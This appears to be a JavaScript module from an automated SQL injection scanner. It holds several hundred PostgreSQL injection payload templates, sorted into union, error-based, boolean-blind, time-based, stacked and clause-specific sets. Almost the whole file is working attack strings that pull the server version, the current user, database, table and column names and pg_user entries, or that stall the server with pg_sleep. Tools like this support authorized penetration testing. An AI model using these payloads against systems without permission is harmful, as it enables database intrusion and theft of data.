// PostgreSQL payload 模板（从 payloads.js 拆分）
// 占位符：{ORIG}=原始值 {SLEEP}=延迟秒数 {NUM}=随机整数 {SEP}=注释符

export const postgresPayloads = {
  union: [
    "{ORIG} UNION SELECT {NUM},version(),current_user-- -",
    "{ORIG}' UNION SELECT {NUM},version(),current_user-- -",
    '{ORIG}" UNION SELECT {NUM},version(),current_user-- -',
    "{ORIG}) UNION SELECT {NUM},version(),current_user-- -",
    "{ORIG}') UNION SELECT {NUM},version(),current_user-- -",
    "{ORIG} UNION ALL SELECT {NUM},version(),current_user-- -",
    "{ORIG}' UNION ALL SELECT {NUM},version(),current_user-- -",
    "{ORIG} UNION SELECT {NUM},current_database(),version()-- -",
    "{ORIG}' UNION SELECT {NUM},(SELECT datname FROM pg_database WHERE datistemplate=false LIMIT 1),1-- -",
    "{ORIG}' UNION SELECT {NUM},(SELECT table_name FROM information_schema.tables WHERE table_schema='public' LIMIT 1),1-- -",
    "{ORIG}' UNION SELECT {NUM},(SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1),1-- -",
    // —— 扩容：闭合组合（')) / ")）× 表达式族（对标 sqlmap UNION payload 矩阵）——
    "{ORIG}')) UNION SELECT {NUM},version(),current_user-- -",
    '{ORIG}")) UNION SELECT {NUM},version(),current_user-- -',
    "{ORIG}')) UNION ALL SELECT {NUM},current_database(),version()-- -",
    "{ORIG}')) UNION ALL SELECT {NUM},current_user,version()-- -",
    "{ORIG} UNION SELECT {NUM},inet_server_addr()::text,inet_server_port()-- -",
    "{ORIG} UNION SELECT {NUM},current_user,inet_server_port()-- -",
    "{ORIG}' UNION SELECT {NUM},current_schema,current_user-- -",
    "{ORIG}' UNION SELECT {NUM},(SELECT string_agg(table_name,',') FROM information_schema.tables WHERE table_schema='public'),1-- -",
    "{ORIG}' UNION SELECT {NUM},(SELECT string_agg(column_name,',') FROM information_schema.columns WHERE table_name='users'),1-- -",
    "{ORIG} UNION ALL SELECT {NUM},session_user,version()-- -",
    '{ORIG}" UNION ALL SELECT {NUM},current_user,current_database()-- -',
    '{ORIG}" UNION ALL SELECT {NUM},version(),current_schema-- -',
    "{ORIG}') UNION ALL SELECT {NUM},version(),current_database()-- -",
    "{ORIG}' UNION SELECT {NUM},(SELECT usename FROM pg_user ORDER BY 1 LIMIT 1),1-- -",
    "{ORIG}' UNION SELECT {NUM},current_setting('server_version'),current_user-- -",
    "{ORIG} UNION SELECT {NUM},version(),(SELECT count(*) FROM pg_stat_activity)-- -",
    '{ORIG}" UNION SELECT {NUM},(SELECT table_name FROM information_schema.tables WHERE table_schema=\'public\' LIMIT 1),1-- -',
    "{ORIG}' UNION ALL SELECT {NUM},(SELECT string_agg(table_name,',') FROM information_schema.tables WHERE table_schema NOT IN ('information_schema','pg_catalog') LIMIT 1),1-- -",
    // —— [SQLMAP-PARITY] UNION 多列 NULL 探测 / UNION ALL 变体 / 闭合组合 / 标量子查询回显 ——
    "{ORIG} UNION SELECT NULL,version(),current_user-- -",
    "{ORIG}' UNION SELECT NULL,version(),current_user-- -",
    '{ORIG}" UNION SELECT NULL,version(),current_user-- -',
    "{ORIG} UNION SELECT NULL,NULL,version()-- -",
    "{ORIG}' UNION SELECT NULL,NULL,version()-- -",
    "{ORIG} UNION ALL SELECT NULL,version(),current_database()-- -",
    "{ORIG}' UNION ALL SELECT NULL,version(),current_database()-- -",
    "{ORIG}) UNION SELECT NULL,version(),current_user-- -",
    "{ORIG}') UNION SELECT NULL,version(),current_user-- -",
    "{ORIG}')) UNION SELECT NULL,version(),current_user-- -",
    '{ORIG}")) UNION SELECT NULL,version(),current_user-- -',
    "{ORIG} UNION SELECT {NUM},NULL,current_user-- -",
    "{ORIG}' UNION SELECT {NUM},version()::text,current_user-- -",
    "{ORIG}' UNION SELECT {NUM},(SELECT string_agg(datname,',') FROM pg_database WHERE datistemplate=false),1-- -",
    "{ORIG}' UNION SELECT {NUM},(SELECT current_database()),(SELECT current_user)-- -",
    "{ORIG}' UNION SELECT {NUM},(SELECT version()),(SELECT current_schema)-- -",
  ],
  error: [
    "{ORIG}' AND CAST((SELECT version()) AS int)-- -",
    '{ORIG}" AND CAST((SELECT version()) AS int)-- -',
    "{ORIG}' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT version()),0x7e,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)y)-- -",
    "{ORIG} AND CAST((SELECT version()) AS int)-- -",
    "{ORIG}') AND CAST((SELECT current_user) AS int)-- -",
    "{ORIG}' AND 1=CAST((SELECT current_database()) AS int)-- -",
    // 重叠函数报错（PostgreSQL 特有）
    "{ORIG}' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT current_database()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)y)-- -",
    "{ORIG}' AND 1=CAST((SELECT current_schema) AS int)-- -",
    "{ORIG}' AND 1=CAST((SELECT usename FROM pg_user WHERE usesysid=10) AS int)-- -",
    "{ORIG}' AND 1=CAST((SELECT datname FROM pg_database) AS int)-- -",
    "{ORIG}' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT table_name FROM information_schema.tables WHERE table_schema='public' LIMIT 1),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)y)-- -",
    "{ORIG}' AND 1=CAST((SELECT version()) AS bigint)-- -",
    // 更多 PG 报错变体（对标 sqlmap 覆盖）
    "{ORIG}' AND 1=CAST((SELECT current_query) AS int)-- -",
    "{ORIG}' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT current_schema),0x7e,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)y)-- -",
    // —— 扩容：CAST 类型报错族（boolean/date/numeric/int + :: 操作符；报错文本回带原值）——
    "{ORIG}' AND CAST((SELECT current_user) AS boolean)-- -",
    "{ORIG}' AND 1=CAST((SELECT current_database()) AS boolean)-- -",
    "{ORIG}' AND CAST((SELECT version()) AS date)-- -",
    "{ORIG}' AND 1=(SELECT current_user)::int-- -",
    "{ORIG}' AND 1=(SELECT version())::int-- -",
    "{ORIG}' AND CAST((SELECT usename FROM pg_user LIMIT 1) AS boolean)-- -",
    "{ORIG}' AND 1=CAST((SELECT datname FROM pg_database WHERE datname=current_database()) AS int)-- -",
    "{ORIG}') AND CAST((SELECT current_user) AS boolean)-- -",
    "{ORIG}' AND (SELECT CAST((SELECT version()) AS numeric))>0-- -",
    "{ORIG}' AND 1=CAST((SELECT current_setting('server_version')) AS int)-- -",
    // —— 扩容：注释符 /**/ 变体 + CAST 类型族补全(date/boolean/integer) + UPDATE 除零 + LIMIT 子句 ——
    "{ORIG}' AND CAST((SELECT version()) AS int)/**/",
    "{ORIG}' AND 1=CAST((SELECT version()) AS date)-- -",
    "{ORIG}' AND 1=CAST((SELECT version()) AS boolean)-- -",
    "{ORIG}' AND 1=CAST((SELECT version()) AS integer)-- -",
    "{ORIG},1=(SELECT 1/0)-- -",
    "{ORIG} FETCH FIRST 1 ROWS ONLY; SELECT 1/0-- -",
    // —— HAVING 子句报错注入（CAST 类型转换失败回带 version()；对标 sqlmap having clause）——
    // HAVING 后接 CAST 报错表达式：HAVING 1=1 AND 1=CAST(...AS integer)，双条件 AND 不改变错误语义。
    "{ORIG} HAVING 1=1 AND 1=CAST((SELECT version()) AS integer)-- -",
    // —— OFFSET FETCH 分页报错注入（堆叠除零；对标 sqlmap OFFSET FETCH clause）——
    // 与已有的 FETCH FIRST 变体互补，追加 OFFSET 0 ROWS 前缀形成完整 OFFSET/FETCH 分页语法。
    "{ORIG} OFFSET 0 ROWS FETCH FIRST 1 ROWS ONLY; SELECT 1/0-- -",
    // —— 深度扩容：regclass 无效 OID / CAST('a' AS integer) / CAST 类型族 numeric 补全 ——
    "{ORIG}' AND 1::regclass-- -",
    "{ORIG}' AND CAST('a' AS integer)-- -",
    "{ORIG}' AND 1=CAST((SELECT version()) AS numeric)-- -",
    "{ORIG}' AND 1=CAST((SELECT version()) AS numeric)/**/",
    "{ORIG}')) AND CAST((SELECT version()) AS int)-- -",
    '{ORIG}")) AND CAST((SELECT version()) AS int)-- -',
    "{ORIG}') AND CAST((SELECT version()) AS int)-- -",
    '{ORIG}") AND CAST((SELECT version()) AS int)-- -',
    // —— ::操作符报错族 + 整型转换目标扩展 ——
    "{ORIG}' AND 1=(SELECT current_database())::int-- -",
    "{ORIG}' AND 1=(SELECT usename FROM pg_user LIMIT 1)::int-- -",
    "{ORIG}' AND 1=(SELECT datname FROM pg_database LIMIT 1)::int-- -",
    "{ORIG}' AND 1=CAST((SELECT current_database()) AS numeric)-- -",
    "{ORIG}' AND 1=CAST((SELECT current_user) AS numeric)-- -",
    "{ORIG}' AND CAST((SELECT current_database()) AS date)-- -",
    "{ORIG}' AND CAST((SELECT current_user) AS date)-- -",
    // —— JSON / XML 类型转换报错 ——
    "{ORIG}' AND 1=CAST((SELECT version()) AS json)-- -",
    "{ORIG}' AND 1=CAST((SELECT version()) AS xml)-- -",
    // —— 子查询多行 / 除零对象报错 ——
    "{ORIG}' AND (SELECT 1 UNION SELECT 2)=1-- -",
    '{ORIG}" AND (SELECT 1 UNION SELECT 2)=1-- -',
    "{ORIG}' AND 1=(SELECT 1/0)-- -",
    "{ORIG}' AND (SELECT 1/0)=1-- -",
    "{ORIG}' AND 1=CAST((SELECT current_setting('server_version')) AS numeric)-- -",
    // —— 注释符 /**/ 变体 ——
    "{ORIG}' AND 1::regclass/**/",
    "{ORIG}' AND CAST('a' AS integer)/**/",
    // [SQLMAP-PARITY] regclass cast / conditional division by zero / XMLTABLE
    "{ORIG}' AND 1=CAST((SELECT version())::text AS regclass)-- -",
    "{ORIG}' AND 1=(SELECT 1/(CASE WHEN (SELECT version()) IS NOT NULL THEN 1 ELSE 0 END))-- -",
    "{ORIG}' AND 1=(SELECT xmltable.encode('text'))-- -",
    // —— [SQLMAP-PARITY] CAST 类型族补全(money/timestamp/float/double/jsonb) / ::操作符 / 除零子查询 / 闭合变体 ——
    "{ORIG}' AND 1=CAST((SELECT version()) AS money)-- -",
    "{ORIG}' AND 1=CAST((SELECT current_database()) AS money)-- -",
    "{ORIG}' AND 1=CAST((SELECT current_user) AS money)-- -",
    "{ORIG}' AND CAST((SELECT version()) AS timestamp)-- -",
    "{ORIG}' AND 1=CAST((SELECT version()) AS timestamp)-- -",
    "{ORIG}' AND 1=CAST((SELECT current_database()) AS timestamp)-- -",
    "{ORIG}' AND 1=CAST((SELECT version()) AS float)-- -",
    "{ORIG}' AND 1=CAST((SELECT current_database()) AS float)-- -",
    "{ORIG}' AND 1=CAST((SELECT version()) AS double precision)-- -",
    "{ORIG}' AND 1=CAST((SELECT current_user) AS double precision)-- -",
    "{ORIG}' AND 1=(SELECT current_schema)::int-- -",
    "{ORIG}' AND 1=(SELECT version())::numeric-- -",
    "{ORIG}' AND 1=(SELECT current_database())::float-- -",
    "{ORIG}' AND 1=(SELECT current_user)::numeric-- -",
    "{ORIG}' AND 1=(SELECT 1/(SELECT version()))-- -",
    "{ORIG}' AND 1=(SELECT 1/(SELECT current_database()))-- -",
    "{ORIG}' AND 1=(SELECT 1/(SELECT current_user))-- -",
    "{ORIG}' AND (SELECT 1/(SELECT version()))=1-- -",
    "{ORIG}' AND 1=CAST((SELECT version()) AS jsonb)-- -",
    "{ORIG}' AND 1=CAST((SELECT current_database()) AS jsonb)-- -",
    "{ORIG}' AND 1=CAST((SELECT current_user) AS jsonb)-- -",
    "{ORIG}' AND 1=CAST((SELECT current_database()) AS json)-- -",
    "{ORIG}' AND 1=CAST((SELECT current_user) AS json)-- -",
    "{ORIG}' AND CAST((SELECT current_database()) AS bigint)-- -",
    "{ORIG}' AND CAST((SELECT current_user) AS bigint)-- -",
    "{ORIG}' AND 1=CAST((SELECT current_database())::text AS regclass)-- -",
    "{ORIG}' AND 1=CAST((SELECT current_user)::text AS regclass)-- -",
    "{ORIG}' AND 1=CAST((SELECT current_database()) AS int)/**/",
    "{ORIG}' AND 1=CAST((SELECT current_user) AS int)/**/",
    "{ORIG}' AND 1=(SELECT xmltable.encode('text'))/**/",
    "{ORIG}') AND 1=CAST((SELECT version()) AS numeric)-- -",
    "{ORIG}')) AND 1=CAST((SELECT version()) AS money)-- -",
    '{ORIG}") AND 1=CAST((SELECT version()) AS money)-- -',
    "{ORIG}' AND CAST('a' AS float)-- -",
    "{ORIG}' AND CAST('a' AS numeric)-- -",
    "{ORIG}' AND 1=CAST((SELECT current_setting('server_version')) AS money)-- -",
  ],
  boolean: [
    "{ORIG}' AND '1'='1",
    '{ORIG}" AND "1"="1',
    "{ORIG}' AND '1'='2",
    '{ORIG}" AND "1"="2',
    "{ORIG} AND 1=1",
    "{ORIG} AND 1=2",
    // [6,7] OR-based 布尔变体（对标 sqlmap risk>=2 的 OR 边界，BooleanBlindDetector 在 risk>=2 时投放）
    "{ORIG}' OR '1'='1",
    "{ORIG}' OR '1'='2",
    // —— 扩容：注释符 /**/ 变体 + UPDATE 逗号拼接 + ORDER BY 除零（对标 sqlmap PG 向量）——
    "{ORIG}' AND '1'='1/**/",
    "{ORIG}' AND '1'='2/**/",
    "{ORIG},1=1-- -",
    "{ORIG},1=2-- -",
    "{ORIG},(SELECT 1)-- -",
    "{ORIG},(SELECT 1/0)-- -",
    // —— DELETE USING 子句注入（DELETE FROM t USING t AS c WHERE ... {INJECT}）——
    // DELETE/USING 位置可用 AND 谓词追加：恒真谓词删更多行、恒假谓词删 0 行，
    // 行影响数/结果集差异即布尔判别（PG 不允许直接 UNION 进 DELETE 语句，AND 谓词为适配向量）。
    "{ORIG} AND 1=1-- -",
    "{ORIG} AND 1=2-- -",
    // —— 深度扩容：多重括号嵌套闭合变体（BooleanBlindDetector 固定索引外追加）——
    "{ORIG}')) AND 1=1-- -",
    "{ORIG}')) AND 1=2-- -",
    '{ORIG}")) AND 1=1-- -',
    '{ORIG}")) AND 1=2-- -',
    // —— 子查询布尔（当前库名/版本/用户首字符探测；真假对）——
    "{ORIG} AND (SELECT SUBSTR(current_database(),1,1))='p'-- -",
    "{ORIG} AND (SELECT SUBSTR(current_database(),1,1))='x'-- -",
    "{ORIG} AND (SELECT SUBSTR(version(),1,1))='P'-- -",
    "{ORIG} AND (SELECT SUBSTR(version(),1,1))='X'-- -",
    "{ORIG} AND (SELECT SUBSTR(current_user,1,1))='p'-- -",
    "{ORIG} AND (SELECT SUBSTR(current_user,1,1))='x'-- -",
    "{ORIG} AND (SELECT 1)=(SELECT 1)-- -",
    "{ORIG} AND (SELECT 1)=(SELECT 2)-- -",
    // [SQLMAP-PARITY] regex boolean / COALESCE boolean
    "{ORIG}' AND '1' ~ (SELECT CASE WHEN (1=1) THEN '1' ELSE '' END)-- -",
    "{ORIG}' AND COALESCE((SELECT 1 WHERE 1=1), 0)=1-- -",
    // —— [SQLMAP-PARITY] 注释符变体(-- -/**/) / OR 数字上下文 / LIKE / SUBSTR 多目标 / EXISTS / CASE 布尔 ——
    "{ORIG} AND 1=1/**/",
    "{ORIG} AND 1=2/**/",
    "{ORIG}' AND 1=1-- -",
    "{ORIG}' AND 1=2-- -",
    "{ORIG}' AND 1=1/**/",
    "{ORIG}' AND 1=2/**/",
    "{ORIG} OR 1=1-- -",
    "{ORIG} OR 1=2-- -",
    "{ORIG} OR 1=1/**/",
    "{ORIG}' OR '1'='1'-- -",
    "{ORIG}' OR '1'='2'-- -",
    "{ORIG} AND (SELECT SUBSTR(current_schema,1,1))='p'-- -",
    "{ORIG} AND (SELECT SUBSTR(current_schema,1,1))='x'-- -",
    "{ORIG} AND (SELECT SUBSTR(current_database(),1,1)) LIKE 'p'-- -",
    "{ORIG} AND (SELECT SUBSTR(current_database(),1,1)) LIKE 'x'-- -",
    "{ORIG} AND (SELECT LENGTH(current_database()))>0-- -",
    "{ORIG} AND (SELECT LENGTH(current_database()))<0-- -",
    "{ORIG} AND EXISTS(SELECT 1)-- -",
    "{ORIG} AND EXISTS(SELECT 1 WHERE 1=2)-- -",
    "{ORIG} AND (SELECT CASE WHEN 1=1 THEN 1 ELSE 0 END)=1-- -",
    "{ORIG} AND (SELECT CASE WHEN 1=2 THEN 1 ELSE 0 END)=1-- -",
    "{ORIG}' AND '1'='1'-- -",
    "{ORIG}' AND '1'='2'-- -",
    '{ORIG}" AND "1"="1"-- -',
    '{ORIG}" AND "1"="2"-- -',
  ],
  time: [
    "{ORIG}' AND pg_sleep({SLEEP})-- -",
    '{ORIG}" AND pg_sleep({SLEEP})-- -',
    "{ORIG}'; SELECT pg_sleep({SLEEP})-- -",
    "{ORIG} AND pg_sleep({SLEEP})-- -",
    // —— 扩容：括号闭合组合 + FROM 子查询变体 ——
    "{ORIG}') AND pg_sleep({SLEEP})-- -",
    "{ORIG}')) AND pg_sleep({SLEEP})-- -",
    '{ORIG}") AND pg_sleep({SLEEP})-- -',
    "{ORIG}' AND 1=(SELECT 1 FROM (SELECT pg_sleep({SLEEP})) x)-- -",
    "{ORIG} AND (SELECT 1 FROM (SELECT pg_sleep({SLEEP})) x)=1-- -",
    // —— 扩容：注释符 /**/ 变体 + ORDER BY pg_sleep 子查询 ——
    "{ORIG}' AND pg_sleep({SLEEP})/**/",
    "{ORIG},(SELECT pg_sleep({SLEEP}))-- -",
    // —— 深度扩容：pg_sleep 谓词化 / CASE 延迟 / 闭合变体 ——
    "{ORIG}' AND pg_sleep({SLEEP}) IS NOT NULL-- -",
    "{ORIG}' AND 1=(SELECT CASE WHEN 1=1 THEN pg_sleep({SLEEP}) ELSE 0 END)-- -",
    "{ORIG}') AND pg_sleep({SLEEP}) IS NOT NULL-- -",
    "{ORIG}')) AND pg_sleep({SLEEP}) IS NOT NULL-- -",
    '{ORIG}") AND pg_sleep({SLEEP}) IS NOT NULL-- -',
    "{ORIG}' AND pg_sleep({SLEEP}) IS NOT NULL/**/",
    "{ORIG}' AND 1=(SELECT pg_sleep({SLEEP}))-- -",
    "{ORIG},pg_sleep({SLEEP})-- -",
    "{ORIG}' AND 1=(SELECT CASE WHEN 1=1 THEN pg_sleep({SLEEP}) ELSE 0 END)/**/",
    // [SQLMAP-PARITY] CASE 包裹的 pg_sleep（sleep 时长仍走 {SLEEP} 配置，保证阈值可判定）
    "{ORIG}' AND (SELECT CASE WHEN (1=1) THEN pg_sleep({SLEEP}) ELSE pg_sleep(0) END)-- -",
    // 注：COPY ... TO PROGRAM（OS 命令执行）/ pg_read_file / lo_import（服务端文件读写）
    // 已移出默认池，见 destructive.js（需 risk>=3 显式开启）。
    // —— [SQLMAP-PARITY] pg_sleep 谓词化/无引号变体 / CASE 条件延迟 / 子查询延迟 / 注释符矩阵 ——
    "{ORIG} AND pg_sleep({SLEEP}) IS NOT NULL-- -",
    "{ORIG} AND pg_sleep({SLEEP}) IS NOT NULL/**/",
    "{ORIG} AND pg_sleep({SLEEP})/**/",
    "{ORIG} OR pg_sleep({SLEEP}) IS NOT NULL-- -",
    "{ORIG}' OR pg_sleep({SLEEP}) IS NOT NULL-- -",
    "{ORIG} AND 1=(SELECT CASE WHEN 1=1 THEN pg_sleep({SLEEP}) ELSE 0 END)-- -",
    "{ORIG} AND 1=(SELECT CASE WHEN 1=1 THEN pg_sleep({SLEEP}) ELSE 0 END)/**/",
    "{ORIG} AND (SELECT CASE WHEN (1=1) THEN pg_sleep({SLEEP}) ELSE pg_sleep(0) END)-- -",
    "{ORIG} AND 1=(SELECT pg_sleep({SLEEP}))/**/",
    "{ORIG} AND (SELECT pg_sleep({SLEEP})) IS NOT NULL-- -",
    "{ORIG}' AND (SELECT pg_sleep({SLEEP})) IS NOT NULL-- -",
    "{ORIG} AND (SELECT 1 FROM (SELECT pg_sleep({SLEEP})) x)=1/**/",
    "{ORIG} AND 1=(SELECT 1 FROM (SELECT pg_sleep({SLEEP})) x)-- -",
    "{ORIG},(SELECT pg_sleep({SLEEP}))/**/",
    "{ORIG},pg_sleep({SLEEP})/**/",
  ],
  // 堆叠注入：以 `;` 追加独立的 pg_sleep 延迟语句
  stacked: [
    "{ORIG}; SELECT pg_sleep({SLEEP}) {SEP}",
    "{ORIG}'; SELECT pg_sleep({SLEEP}) {SEP}",
    '{ORIG}"; SELECT pg_sleep({SLEEP}) {SEP}',
    "{ORIG}); SELECT pg_sleep({SLEEP}) {SEP}",
    "{ORIG}') ;SELECT pg_sleep({SLEEP}) {SEP}",
    "{ORIG}'; select pg_sleep({SLEEP}) {SEP}",
    // 注：dblink_connect 外连 / pg_ls_dir 目录列举已移出默认池（见 destructive.js）。
    // 外连类向量应走 OOB 通道的 {CALLBACK} 占位符，不得硬编码第三方域名。
    // —— [SQLMAP-PARITY] 闭合变体(')) / ")) / ') / 注释符 / CASE 条件堆叠延迟 ——
    "{ORIG}')); SELECT pg_sleep({SLEEP}) {SEP}",
    '{ORIG}")); SELECT pg_sleep({SLEEP}) {SEP}',
    "{ORIG}; SELECT pg_sleep({SLEEP})/**/",
    "{ORIG}'; SELECT pg_sleep({SLEEP})/**/",
    '{ORIG}"; SELECT pg_sleep({SLEEP})/**/',
    "{ORIG}; SELECT CASE WHEN 1=1 THEN pg_sleep({SLEEP}) ELSE 0 END {SEP}",
    "{ORIG}'); SELECT pg_sleep({SLEEP})/**/",
    "{ORIG})); SELECT pg_sleep({SLEEP}) {SEP}",
  ],
};

// PostgreSQL 子句位置感知模板（CLAUSE_PAYLOADS.PostgreSQL）
export const postgresClauses = {
  // ORDER BY 列位置：假模板用 CASE+1/0 除零（PG 整数除零报 "division by zero"）
  orderby: {
    boolean: [["{ORIG},(SELECT 1)-- -", "{ORIG},(SELECT CASE WHEN 1=2 THEN 1 ELSE 1/0 END)-- -"]],
    error: ["{ORIG},(SELECT CAST((SELECT version()) AS int))-- -"],
    time: ["{ORIG},(SELECT pg_sleep({SLEEP}))-- -"],
  },
  groupby: {
    boolean: [
      ["{ORIG} HAVING 1=1-- -", "{ORIG} HAVING 1=2-- -"],
      ["{ORIG}' HAVING '1'='1'-- -", "{ORIG}' HAVING '1'='2'-- -"],
    ],
  },
  having: {
    boolean: [["{ORIG} AND 1=1-- -", "{ORIG} AND 1=2-- -"]],
  },
  // LIMIT 位置：PG 的 LIMIT 接受任意整型表达式；假模板 *0 → LIMIT 0 → 空结果（偏离基线）
  limit: {
    boolean: [["{ORIG}+0-- -", "{ORIG}*0-- -"]],
  },
  where: {
    boolean: [
      ["{ORIG}') AND 1=1-- -", "{ORIG}') AND 1=2-- -"],
      ["{ORIG}')) AND '1'='1'-- -", "{ORIG}')) AND '1'='2'-- -"],
      ['{ORIG}") AND 1=1-- -', '{ORIG}") AND 1=2-- -'],
    ],
  },
};
